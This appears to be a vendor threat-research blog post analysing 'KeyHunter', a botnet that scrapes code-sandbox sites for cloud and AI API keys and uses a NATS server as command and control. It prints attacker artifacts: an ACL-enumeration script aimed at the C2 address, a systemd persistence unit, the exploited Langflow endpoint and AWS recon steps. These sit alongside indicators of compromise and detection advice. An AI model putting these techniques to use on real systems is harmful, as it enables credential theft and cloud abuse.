NATS-as-C2: Inside a new technique attackers are using to harvest cloud credentials and AI API keys

Published by:

Michael Clark

Director of Threat Research

The NATS-as-C2 tool chain

The operator named the project KeyHunter, likely after the original tool designed to discover API key leaks. The initial worker download confirmed the C2 endpoint and message bus identity:

=== KeyHunter Python Worker ===
Worker ID: py-XXXXXX
NATS: nats://45.192.109.25:14222
Capabilities: ['scan_cde', 'scan_web', 'validate_aws', 'validate_ai']
[REGEX] Loaded 12 patterns

The four declared capabilities are also the worker's NATS subscribe subjects — task.scan_cde, task.scan_web, task.validate_aws, and task.validate_ai — all of which were captured from the Python source. Each is a discrete monetization path:

scan_cde targets Cloud Development Environment platforms (CodePen, JSFiddle, StackBlitz, CodeSandbox), with a GenericClient fallback for any URL the queue dispatches. This is shared-snippet credential harvesting, which is uncommon.
scan_web scrapes an arbitrary URL.
validate_aws confirms harvested AWS access keys are live by calling sts:GetCallerIdentity via boto3 and recording the returned Account, Arn, and UserId for the operator.
validate_ai validates harvested LLM provider keys directly against vendor APIs. The open-source fadidevv/keyhunter project covers a similar provider set, and the operator may have copied the brand.

A single worker is positioned to harvest both cloud credentials and AI API keys from the same scan output, and to confirm whether each is live before reporting back. This creates two independent revenue streams from one captured-key pipeline.

Using an access control list-enforced server-side

According to logs, the NATS worker started failing immediately on its first publish:

nats: encountered error
nats.errors.Error: nats: permissions violation for publish to "heartbeat.worker"

The operator responded by writing an ad-hoc enumeration script directly into the exploit channel. The captured prefix is below:

import asyncio, nats, json

async def test():
    nc = await nats.connect("nats://45.192.109.25:14222",
                            user="worker",
                            password="Wkr-XXXX",
                            name="test-perm")
    results = []
    for s in [...]:    # candidate subject list, body of script truncated in capture

The output produced by the full script, listing the subjects the worker role was authorized to publish to under name="test-perm":

heartbeat.worker     = OK
worker.hb            = OK
worker.heartbeat     = OK
result.scan          = OK
scan.result          = OK
result               = OK
worker.result        = OK
kh.result            = OK
keyhunter.result     = OK
workers.heartbeat    = OK

A correctly configured NATS server applies subject-level authorization at the wire layer. The worker role can publish results and heartbeats but cannot publish to control subjects, subscribe to other workers, or read the operator's command stream. A captured node cannot pivot into the bus. This is the principle of least privilege applied to a botnet, and it is the principal reason NATS-as-C2 is architecturally interesting.

The operator's rewrites (hb.worker instead of heartbeat.worker, then worker.hb) were live debugging against an Access Control List (ACL) they did not, in fact, control. The Go binary failed independently, leaking a Windows build path in its panic output:

fatal error: failed to reserve page summary memory

runtime stack:
runtime.throw({0x92e78b?, 0x20000000?})
        D:/Program Files/Go/src/runtime/panic.go:1094 +0x48

The operator made one final attempt to constrain the Go runtime with GOMEMLIMIT=400MiB, but Go's mheap allocates the page summary before honoring GOMEMLIMIT, so the binary panicked at the same spot. After that attempt, the session ended. The Python worker remained the operational path, and the Go binary was abandoned in this environment.

What the operator was actually doing

The deploy attempt analyzed above was the second half of a longer session. Over the preceding 10 hours, the same operator IP ran a complete credential-harvest-and-replay cycle, and the deploy attempt was intended to add a stable node to their pool after extracting as much as they could from the immediate target.

Timeline

Time (UTC)	Activity
04:13	First probes against an LMDeploy (LLM inference service) instance: Swagger root, /v1/models enumeration, SSRF against the multimodal endpoint
04:00 – 09:00203	SSRF exploit events against LMDeploy, plus master-key and admin-surface probing on a LiteLLM instance
09:09	First probe against the Langflow target
9:12	Successful unauthenticated RCE via CVE-2026-33017 /api/v1/build_public_tmp//flow. Attacker payload dumped the process environment, extracting AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY
09:21	First AWS API call with the harvested credentials: sts:GetCallerIdentity, accepted
09:21 – 13:39	AWS API calls across bedrock, sts, s3, ec2, ce, lambda, logs, ecs, sagemaker, sso, iam
14:03	Return to the Langflow target with the worker-deploy attempt detailed in the previous section

The AWS reconnaissance pattern consisted of:

Bedrock:InvokeModel attempts. The operator was specifically trying to use the harvested key against AWS Bedrock foundation models to conduct LLMjacking. This is the same monetization pathway as the worker's validate_ai capability, just applied to AWS-native LLM inference rather than OpenAI or Anthropic SaaS keys. Stolen Bedrock access converts directly to compute that the operator does not pay for, and the cost-per-token on premium foundation models (Claude, Llama 3) is significant enough at scale to be worth the burn rate of testing thousands of harvested AWS keys.
Bedrock:ListInferenceProfiles and Bedrock:ListModelInvocationJobs, control-plane discovery probing, which model regions and inference endpoints the IAM role had access to.
sts:GetCallerIdentity calls. Confirms the key was live and identifies its IAM principal. The worker's validate_aws capability does exactly this.
S3:ListBuckets, ec2:DescribeInstances, ce:GetCostAndUsage, lambda:ListFunctions, logs:DescribeLogGroups, ecs:ListClusters, sagemaker:ListEndpoints, sso:ListInstances, iam:ListAttachedUserPolicies calls. This is a standard scoped-key reconnaissance sweep, enumerating every common AWS service surface in a few seconds.

The pattern above is exactly what an automated validate_aws worker does at scale: confirm liveness, enumerate the IAM principal's reach, then route the key to the highest-value service it has access to.

Static triage of the worker binary

The operator's staging server was still serving four files from 159.89.205.184:8888 after the session ended: worker-linux-amd64 (9.4 MB Go binary), keyhunter_worker.py (Python fallback), deploy.sh (production installer), and worker.yaml (config).

The Go binary is statically linked, stripped, CGO-disabled, and includes a module path to github.com/keyhunter/worker (devel). It also has source paths in the symbol table which leak the operator's Windows project layout:

D:/Program Files/Go/... for module cache.
/AyuGram Desktop/KeyHunter-Distributed/worker/... for the working tree. (AyuGram Desktop is a custom Telegram desktop client.)

Decompiling the package layout reveals rich tool information, including that it targets online code-sandbox platforms, not GitHub. The worker ships dedicated scrapers for four platforms, each with multiple fallback extraction strategies:

Platform	Extraction methods
CodePen	extractViaInitData, extractViaNextData, extractViaPenVar, extractViaTextarea
JSFiddle	extractViaEditorConfig, extractViaPanel, extractViaTextarea
StackBlitz	downloadViaAPI, downloadViaPage
CodeSandbox	downloadDirect, downloadViaSidecar

GitHub is the obvious target for these credential hunters and the focus of every published OSS tool in this space. Online code sandboxes are a quieter and arguably richer corpus: Developers paste API keys to test snippets, share the snippet for help, and never delete them. The number of per-platform fallbacks is an engineering effort. Each platform has been reverse-engineered for at least two different extraction paths, so a frontend change does not break the worker.

uTLS browser-fingerprint mimicry

The binary imports github.com/refraction-networking/utls v1.8.2. uTLS exposes parroted ClientHello fingerprints for browsers like Chrome, Firefox, Safari, iOS, and Android, defeating server-side TLS fingerprinting (JA3, JA4) used by Cloudflare, Akamai, and the bot-detection layers in front of CodeSandbox and StackBlitz. Combined with the multi-strategy extraction logic, this is a credential scraper engineered to evade the bot defenses of the platforms it targets.

Headless-browser sidecar

The Go package contains a SidecarProcess to scrape rendered webpages. CodeSandbox uses downloadViaSidecar as a fallback when the direct API path fails. The most likely purpose is a child subprocess (typically a headless browser) that renders JavaScript-heavy pages, with the buffered connection proxying HTTP between the subprocess and the worker. A pure HTTP scraper does not need this code path.

JetStream pull consumers

The NATS client uses PullSubscribe with AckExplicit, which is the JetStream durable-consumer pattern. Tasks are queued centrally, workers pull and explicitly ack, and a dropped worker returns its in-flight tasks to the queue for redelivery. This matches the architectural argument earlier in this writeup: NATS-as-C2 gives operators durability and at-least-once delivery without bespoke client code. The WorkerStats struct exposes IncrActive, DecrActive, SetTaskProgress, and Snapshot, indicating per-task progress reporting back to the operator console.

Key detection engine

One credential capture is Python-based and embeds a 12-pattern regex set covering AWS, GitHub, OpenAI, Anthropic, Google, Slack, Stripe, private keys, JWTs, and DB URLs (full list in the appendix). It also attempts to invoke gitleaks v8.24.3, if the binary is on disk, for more comprehensive coverage and to catch credentials that may have been missed (similar to a birdbath).

The Go binary integrates gitleaks correctly, using visible string constants for parse error messages and report path templates, so production-host workers retain the full ~150-rule gitleaks coverage.

Persistence

deploy.sh is used as an install script. It assumes root, runs apt-get / yum / apk to install dependencies, fetches gitleaks from GitHub releases, installs to /opt/keyhunter-worker/, and writes a keyhunter-worker.service systemd unit. The systemd unit installed by deploy.sh reads:

[Service]
Type=simple
WorkingDirectory=/opt/keyhunter-worker
ExecStart=/opt/keyhunter-worker/keyhunter-worker
Restart=always
RestartSec=5
LimitNOFILE=65535

Restart=always plus WantedBy=multi-user.target means worker nodes survive reboots, kernel upgrades, and crashes; they are long-lived infrastructure rather than single-use stagers. LimitNOFILE=65535 raises the per-process file-descriptor cap to 65k, sized for many concurrent outbound connections. (The Go binary's per-worker concurrency is 10 in worker.yaml, but each scrape can open multiple sockets, including the headless-browser sidecar.)

OPSEC

Equally telling is what the script does not do. There is no unset HISTFILE, no journald disable, no /tmp scrub, no in-memory-only install path, no log rotation that drops audit traces, and no attempt to hide the systemd unit under a less obvious name. Worker hosts are not forensically hardened.

The reasonable inference is that they are virtual private server (VPS) instances that the operator either rents under disposable identities or treats as fully expendable; the cost of forensic uplift is lower than the cost of building hardened tradecraft, so this threat actor skipped the hardening entirely. This pattern is consistent with small operations that scale by adding cheap nodes rather than by raising the per-node bar.

The deploy script also branches on x86_64 and aarch64, implying both architectures are part of the worker pool. ARM nodes are cheaper at scale and dominant in newer Graviton-class cloud instances, so the operator is presumably distributed across cloud providers and instance types to keep per-AKIA-validated cost low.

Indicators of compromise

Indicator	Type
45.192.109.25:14222	NATS C2
159.89.205.184:8888	Staging HTTP

File hashes

File	SHA-256	Size
worker-linux-amd64	dbee863ad2a39f939be2c7ed76f7d5a8fe000aad2d2b2d32b3e8ec3ee42f1c25	9,453,752
keyhunter_worker.py	323bbf3064d4b83df7920d752636b1acb36f462e58609a815bd8084d1e6b004c	10,979
deploy.sh	16b279aa018c64294d58280636e538f86e3dd9bdcb5734c203373394b72d101a	1,424

Why this matters

NATS servers provide three properties that scanner-pool operators historically had to engineer themselves:

Wire-level authorization: Per-subject ACLs are enforced by the broker, not by client-side checks that a captured node can disable.
One-to-many fan-out: A single publish to result.scan reaches every aggregator without the worker enumerating peers, which improves OPSEC and simplifies horizontal scaling.
First-class auth and durability: Username/password, TLS, and nkey auth are native, and JetStream provides durable queues so a worker can drop offline without losing its work.

The technical bar to operate NATS-as-C2 infrastructure is meaningfully higher than running a Flask panel. The operator at 159.89.205.184 is closer to running a small SaaS than the script kits that are often seen in credential harvesting botnets.

Enumerated NATS publish subjects under the worker ACL: heartbeat.worker, worker.hb, worker.heartbeat, result.scan, scan.result, result, worker.result, kh.result, keyhunter.result, workers.heartbeat.

Detection

Sysdig Secure and OSS Falco rules can be used to detect NATS-as-C2 malware. As previously mentioned, this malware doesn’t take any additional steps when it comes to defense evasion. However, it uses typical mechanisms seen in networks, which can help it hide in place.

Rules that NATS-as-C2 will trigger include:

Suspicious System Service Modification
Outbound Connection to C2 Servers
Sysdig AWS Runtime Analytics

Recommendations

Update Langflow to a version that patches CVE-2026-33017. The vulnerable endpoint is unauthenticated, which makes mass scanning trivial.
Block outbound traffic to 45.192.109.25:14222 and 159.89.205.184:8888 at the network perimeter.
Egress allowlist workloads running AI tooling. Langflow, n8n, and similar visual-flow platforms typically need outbound access only to specific LLM and database endpoints; broad outbound is unnecessary and provides exactly the channel a deployed worker needs to reach a NATS broker.
Rotate any AWS, OpenAI, Anthropic, or HuggingFace credentials that were reachable from a Langflow instance exposed prior to patching. The captured worker validates these in real time.

Conclusion

The KeyHunter operator that the Sysdig TRT discovered is using NATS for the same reasons engineering teams adopt it: subject-scoped authorization, native fan-out, and durable queues. None of those properties alone are unique to legitimate workloads, and applying them to a credential-hunting worker pool produces a botnet that is more liable and scalable than the typical HTTP-panel architecture.

The literal error strings the operator leaked through their RCE channel are a useful detection seed, but the broader takeaway is that NATS-as-C2 is a new, novel pattern that defenders should expect to see more of. As a result, outbound-egress posture matters more than ever before.

‍

About the author

No items found.

featured resources

Test drive the right way to defend the cloud with a security expert

GET A DEMO